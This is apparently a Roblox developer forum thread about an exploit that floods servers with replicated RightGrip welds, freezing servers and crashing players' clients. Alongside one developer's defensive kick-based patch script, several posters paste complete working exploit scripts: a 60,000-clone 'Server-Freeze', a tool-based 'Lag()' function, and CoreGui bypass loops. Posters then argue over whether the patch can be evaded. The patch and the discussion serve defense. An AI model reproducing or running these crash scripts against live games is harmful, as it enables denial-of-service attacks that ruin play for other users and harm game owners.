My game “Wait in a room for 4 hours” has recently become the target of some exploiters that don’t want people to finish the game.
They’re able to abuse replication rules to create thousands of RightGrip welds which get replicated to all clients.
In high enough numbers of RightGrips, this causes clients to instantly crash and the server to hang.
This exploit can be performed on any game that doesn’t explicitly safeguard against it.
If this exploit is performed in the last server open it will poison the server and no new players will be able to join. Players will be matchmade to the server but wont be able to join due to the server hanging.
My game doesn’t even contain tools but logs indicate that exploiters are able to create these welds anyways.
Ya, but in the meanwhile as we wait for this important update I have a patch script that will make your weld crashing problems go away.
local Players = game:GetService("Players")
function GetPlayerByWeld(WeldObject)
if not WeldObject then return nil end
for i,v in pairs(Players:GetPlayers()) do
if v.Character and WeldObject.Part0 and WeldObject.Part0:IsDescendantOf(v.Character) then
return v
end
end
end
game.Workspace.DescendantAdded:Connect(function(Object)
if Object:IsA("Weld") and Object.Name == "RightGrip" then
local Player = GetPlayerByWeld(Object)
local WeldCount = 0
if Player then
Object.AncestryChanged:Connect(function()
if Object.Parent ~= nil and not Object:IsDescendantOf(Player.Character) then
Player:Kick("Ancestry")
Object:Destroy()
end
end)
for i,v in pairs(Object.Parent:GetChildren()) do
if v:IsA("Weld") and v.Name == "RightGrip" then
local Owner = GetPlayerByWeld(v)
if Owner and Owner == Player then
WeldCount = WeldCount + 1
end
end
end
if WeldCount > 2 then
Player:Kick("Max")
Object:Destroy()
end
end
end
end)
I can confirm that exploiters are sharing scripts that use this bug as a ‘freeze any server script’.
--=[[ Server-Freeze, Make Take Up To 30 Seconds For Effects To Show. ]]=--
--/* Locals
local LP = game:GetService('Players').LocalPlayer
if workspace:FindFirstChild(LP.Name) == nil then LP.CharacterAdded:Wait() end
local Char = workspace[LP.Name]
local Hat = Char['Humanoid']:GetAccessories()[1]
local Handle = Hat['Handle']
--/* Tool Setup
local Tool = Instance.new("Tool",LP.Backpack)
Tool.Grip = Tool.Grip * CFrame.new(0,-100,0)
Tool.Parent = Char
Handle.Parent = Tool
game:GetService('RunService').Stepped:Connect(function()
for _,Part in next, Char:GetChildren() do
if Part:IsA('BasePart') then
Part.CanCollide = false
end
end
end)
local HPart; if Char:FindFirstChild('Right Arm') then
HPart = 'Right Arm'
else
HPart = 'RightHand'
end
--/* RightGrip Instance Crash
for _ = 1,60000 do
local Grip = Char[HPart].RightGrip:Clone()
Grip.Parent = Char.Humanoid['Status']
end
--/* Void Deletion
wait(1) local CPart = Instance.new('Part',workspace)
CPart.CanCollide = false
CPart.Transparency = 1 CPart.Anchored = true
CPart.CFrame = Char['Head'].CFrame
workspace.Camera.CameraSubject = CPart
warn('Shutdown Activated') Char['Humanoid'].Sit = true
local BV = Instance.new('BodyVelocity', Char['HumanoidRootPart'])
BV.MaxForce = Vector3.new(1e5,1e5,1e5)
BV.Velocity = Vector3.new(0,-1e5,0)
BV.P = 1e5
I would like to let you know that your method of changing the name of the part from Handle to a different name with the hats doesn’t stop the exploiters as they could use FindFirstChildOfClass(“BasePart”) or Accessory:GetChildren()[1] and rename the part to Handle before parenting it to tool which would make the RightGrip object start replicating to the server.
EDIT: This is about his patch method on his game right now.
Basically in his game that he has issues about he renames the accessories part name to something else than Handle but I just tested in studio that you can rename the part name to Handle before turning it into a tool that will start to replicate to the server.
I can confirm this is an issue. The quick creation and destruction of welds causes the servers to lag spike / freeze when trying to destroy all the welds. More than often, they crash.
I’m not sure posting it here is the best idea. You might want to DM a staff member such as @Osyris with the script instead.
Other members have posted snippets of the same script, just not the full one publicly - I’m sure the staff already have it.
if there are concerns about exploiters getting the script from my post, don’t worry about it. I got it from a very popular community (not v3rm) and plenty of others can do the same.
The requirement for the replication to be success is that the weld is parented to a descendant of the Character, if you put more than 2 welds into the character and then the max count will kick you, try and parent it somewhere else other than your character it’ll kick you for the ancestry change. I would like to see a example of a script that bypasses my script rather than being told it can be bypassed anyway.
I have the game crash script basically for it to work you need to have a tool in your inventory and if the game does not have tool the exploiter can just make their hair a tool using the basic principal that anything the client does to themselves will replicate to the server so this is why the making there hair into a tool works now that i’ve explained that here is the script also an easy fix to prevent this is to check the workspace every minute and remove parts that are not needed and remove the right grips if they are being spammed into the workspace also here is the script, and you can also just check the amount of welds that are inside the character and kick them if there are more than 2 welds at a time.
local RunService = game:GetService("RunService")
local Workspace = game:GetService("Workspace")
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local Character = LocalPlayer.Character or LocalPlayer.CharacterAdded:Wait()
local Backpack = LocalPlayer:FindFirstChild("Backpack")
local RigType = Character:FindFirstChild("Humanoid").RigType
local LagPower = 1000
function Lag()
if Backpack:FindFirstChildOfClass("Tool") then
Backpack:FindFirstChildOfClass("Tool").Parent = Character
else
return error("No tools were found in your backpack, make sure you have atleast one tool in your backpack.")
end
if RigType == 1 then
for i = 1, LagPower do
RunService.Stepped:Connect(function()
local Clone = Character.RightHand.RightGrip:Clone()
Clone.Parent = Character.RightHand
wait()
Clone.Parent = Workspace
end)
end
else
for i = 1, LagPower do
RunService.Stepped:Connect(function()
local Clone = Character.RightArm.RightGrip:Clone()
Clone.Parent = Character.RightArm
wait()
Clone.Parent = Workspace
end)
end
end
end
Lag()
while true do
local clone = localplayer.Character[arm].RightGrip:Clone()
clone.Parent = localplayer.Character[arm]
wait()
clone.Parent = game.CoreGui
end
Bypassed
This can be made faster with renderstepped but it would be still much slower than currently used scripts which clone it more than 100 times each renderstep.
And before you ask, yes it will stay replicated to everyone after you parent it to coregui and it will be moved to their coregui as well.
Here are two things wrong with the script provided.
Parenting the weld to CoreGui will not replicate to the server, even if it did the AncestryChanged event I put on the weld object would catch it immediately and kick the player then delete the object.
I 100% recommend you verify that your bypass actually works before posting.
Not sure what you mean, it does replicate and I just did test it myself with your script.
You don’t seem to realise that your AncestryChanged connection would error before it kicks me since it cannot access CoreGui elements.
Well, I’m pretty sure that exploiters inject the scripts using certain softwares. The script is inserted anywhere in the local region of the player. To counteract this, couldn’t you just add a script in ServerScriptService that deletes the extra RightGrips instantly using ChildAdded? Another way could be deleting new server scripts added in local regions when detected. Also, uncheck the CharacterAutoLoads property in Players and make a custom spawn button (This can help you detect the malicious script while it’s waiting for the character to be added).
Not sure what you mean, it does replicate and I just did test it myself with your script.
How did you verify that the replication is being received?
I did this by running your script in commandline via the client and switched to the server view and viewed CoreGui with no welds in sight.
You don’t seem to realise that your AncestryChanged connection would error before it kicks me since it
Is this just a assumption or do you have an actual error?
EDIT: Did you also run this till a successful crash? As we speak I’m testing this on a game with players to see if this works.
EDIT: I failed to bring the server to a crash and I also removed my “Object.Parent ~= nil” section of the code for it to immediately kick me upon running the script. This means that the server doesn’t accept the replication to CoreGui thus turning the instances parent to nil.
How did you verify that the replication is being received?
Looking at the Server networkreplicator memory usage. When doing it 100 times per step (without your patch) it will mark the server as slow game too. I can definitely guarantee that it does replicate.
Is this just a assumption or do you have an actual error?
No error which is unexpected but it doesnt trigger the kick.
I did this by running your script in commandline via the client and switched to the server view and viewed CoreGui with no welds in sight.
You need to test my script on a live server with an actual exploit since you cant parent things to CoreGui, even in studio.
local localplayer = game.Players.LocalPlayer
local arm = "RightHand"
while true do
for i = 1, 100 do
local clone = localplayer.Character[arm].RightGrip:Clone()
clone.Parent = localplayer.Character[arm]
clone.Parent = game.CoreGui
end
wait()
end
After running the code sampled above, and me being impatient and executing it multiple times the only thing I can experience is lots of FPS lag, I can see the server memory slowly rising MB by MB but no slow server yet, if you could provide me a copy of the script you used to cause the slow server and how long it took would be great.